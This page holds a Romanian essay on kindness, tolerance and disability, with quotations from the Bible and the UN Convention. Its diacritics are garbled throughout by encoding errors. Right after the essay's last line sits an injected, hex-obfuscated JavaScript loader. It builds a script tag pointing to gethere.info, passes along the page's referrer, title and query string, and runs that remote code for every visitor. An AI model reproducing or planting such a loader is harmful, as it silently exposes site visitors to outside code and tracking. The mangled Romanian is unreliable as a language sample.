Dar cine suntem noi? Este A�ntrebarea care tremurA? pe buzele tuturor. De la savanE�i, filozofi, mai marii A�nE�elepE�i ai lumii, sociologii, psihologii, oamenii simpli, aceastA? A�ntrebare a circulat A�n toate colE�urile lumii, s-au gA?sit mii de rA?spunsuri, dar nimeni nu a reuE�it sA? defineascA? cuprinzA?nd de la un capA?t la altul aceastA? A�ntrebare simplA?.
Noi, oamenii, am devenit persoane, A�notA?m A�n vA?ltoarea fondurilor materiale cu disperare, scoE�A?ndu-ne ochii pentru un bA?nuE�, E�antajA?nd, trA?dA?nd, E�i vA?nzA?ndu-ne conE�tiinE�a E�i sufletul pentru o poziE�ie,A� inima E�i viaE�a pentru un certificat de cA?sA?torie, dispreE�uim E�i distrugem dA?nd, cu precA?dere, valoare banilor E�i uitA?m pildele MA?ntuitorului care ne A�nvaE�A? cA? VeE�nicia n-are preE�. a�zCelui ce are i se va da; dar de la cel ce nu are si ce are i se va luaa�?- (Biblie). Deci sA? A�nvA?E�A?m sA? nu ne mai vindem sufletele pe nimic, cand putem avea Totul.
GA?ndim cu mA?ndrie care este diferenE�a dintre noi, eu E�i tu, doi oameni, puternici sau slabi, bogaE�i sau sA?raci, buni sau rA?i.
Care este diferenE�a dintre mine E�i tine? Ai un job bine plA?tit? Te crezi mai bun? Te-ai integrat cu uE�urinE�A? A�n societate? Ai studii ? deci … Cum se traduce dizabilitatea dintre noi?
De exemplu, A�n loc sA? A�ntrebA?m: a�zCe este greE�it cu persoanele cu dizabilitA?E�i?a�?, A�sA? A�ntrebA?m: a�zCe este greE�it cu societatea? Ce condiE�ii sociale, economice, politice E�i/sau de mediu trebuie sA? fie schimbate pentru a facilita accesul deplin la toate drepturile al tuturor persoanelor cu dizabilitA?E�i?a�? – (ConvenE�ia ONU)
Degeaba avem toate uneltele care ne-ar ajuta sA? ducem o viaE�A? frumoasA? dacA? noi suntem rA?i, haini, vulgari, E�tim sA? hulim, sA? jignim, sA? arA?tam cu degetul, sA? cA?utA?m nod A�n papurA? … cA? se duce pe apa sA?mbetei E�i cultura, E�i inteligenE�a, E�i isteE�imea, deoarece NIMIC, dar nimic nu poate A�nlocui puE�inA? bunA?tate, toleranE�A? E�i A�nE�elegere. BunA?tatea sufleteascA? nu este o virtute, este un atribut care defineE�te fiinE�a omeneascA?.
Nu A�E�i doreE�ti tu oare, aceleaE�i lucruri ca E�i mine? Iubire, atenE�ie, mA?ngA?iere, stabilitate, sinceritate, A�ncredere…aE�teptA?ri pe care le dorim de la aproapele nostru? A�De unde putem E�ti ce destin mA?reA? poate avea o persoanA? cu dizabilitate AYi cA?te suflete poate inspira prin exemplul personal? Discriminarea se simte atunci cA?nd priveE�ti cu dispreE�, superioritate, reproAY, intoleranA?A?. E cam trist dacA? dragostea faE�A? de o fiinE�A? e condiE�ionatA? de a�zperfecE�iunea�?. Nu E�tiu voi, dar eu mi-am dorit sA? fiu trasA? de mA?necA? cA?nd trebuie, sA? A�mi acopA?r ochii E�i sA? nu vA?d ce e rA?u A�n altul dar nici ce pare frumos E�i ascunde A�ncA? o posibilA? ranA?, sA? pot sA? sar E�i sA? A�l apA?r pe celA?lalt, sA? tac atunci cA?nd sunt judecatA? pe nedrept, sA? am ochi sA? vA?d durerea altuia E�i sA? nu A�l las sA? sufere, sA? ofer vorbe frumoase care pot alina un suflet greu A�ncercat, sA? aud ce trebuie E�i sA? pot sA? mA? rog neA�ncetat. A�Oh.. nici nu poE�i sA? E�tii cA?te poate face o rugA?ciune A�n aceastA? lume unde rA?utatea asurzeE�te.
Avem libertatea de a face orice, de a alege orice, de a fi oricine. AZn aceastA? lume, viaE�a prinde din ce A�n ce mai multA? vitezA? sA? A�ncercA?m sA? ne amintim cine suntem E�i ce vrem, sA? nu ne pierdem principiile E�i mai presus de toate credinE�a. AE�teptarea aterizA?rii la punct fix a unei pere mA?lA?ieE�e, nu are cum sA? A�E�i ofere rezultatele mult dorite.
Dizabilitatea se traduce prin bunA?tate sau rA?utate, nicidecum prin defecte fizice.
ToE�i suntem datori cu fapte demne de Rai.
Acum E�tiu, am aflat E�i eu, cel mai frumos A�ndemn: Nu uitaE�i, atunci cA?nd vreE�i sA? judecaE�i, mai bine A�mbrA?E�iE�aE�i!var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
3 Comments